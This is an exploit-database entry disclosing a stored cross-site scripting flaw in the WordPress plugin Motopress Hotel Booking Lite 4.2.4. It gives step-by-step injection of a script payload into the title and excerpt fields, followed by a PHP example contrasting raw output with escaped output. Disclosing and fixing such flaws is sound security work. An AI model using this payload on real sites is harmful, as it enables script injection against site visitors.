
2 changes to exploits/shellcodes WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2022-06-05
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://motopress.com/
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
# Version: 4.2.4
# Tested on: Windows/XAMPP
###########################################################################
PoC:

1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
2. Click on "Add Accommodation Type".
3. Add title payload= "><script>alert("XSS")</script>
4. Excerpt input payload "><script>alert("XSS")</script>
5. Click publish.
6. Visit http://localhost/accommodations/
7. XSS payload executes.
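
The steps above store markup in the title and excerpt fields, and it is rendered later on the public listing page. As an added example (not the plugin's code and not from the exploit author), the PHP below contrasts a hypothetical listing template that echoes stored fields raw with one that encodes them at output time; the function names and the HTML layout are assumptions.

```php
<?php
// Added example: a hypothetical listing template, not the plugin's actual code.

// Constructed sample record holding the payload string from the PoC steps.
$room = [
    'title'   => '"><script>alert("XSS")</script>',
    'excerpt' => '"><script>alert("XSS")</script>',
];

// Pattern that leads to stored XSS: values saved by an editor are echoed
// unchanged into an attribute context and an element context.
function render_unsafe(array $room): string
{
    return '<a class="room" title="' . $room['title'] . '">' . $room['title'] . '</a>'
         . '<p>' . $room['excerpt'] . '</p>';
}

// Output encoding: quotes and angle brackets become entities, so the stored
// value can neither close the attribute nor open a new element.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_safe(array $room): string
{
    return '<a class="room" title="' . e($room['title']) . '">' . e($room['title']) . '</a>'
         . '<p>' . e($room['excerpt']) . '</p>';
}

// Regression check usable in a unit test: no raw script tag may survive rendering.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

if (!contains_raw_script(render_unsafe($room))) {
    throw new RuntimeException('unsafe template unexpectedly neutralised the payload');
}
if (contains_raw_script(render_safe($room))) {
    throw new RuntimeException('encoded template still emits a raw script tag');
}

echo render_safe($room), PHP_EOL;
```

Inside WordPress the equivalent output helpers are esc_attr() for attribute values and esc_html() for element text, and sanitize_text_field() can additionally strip tags when the fields are saved.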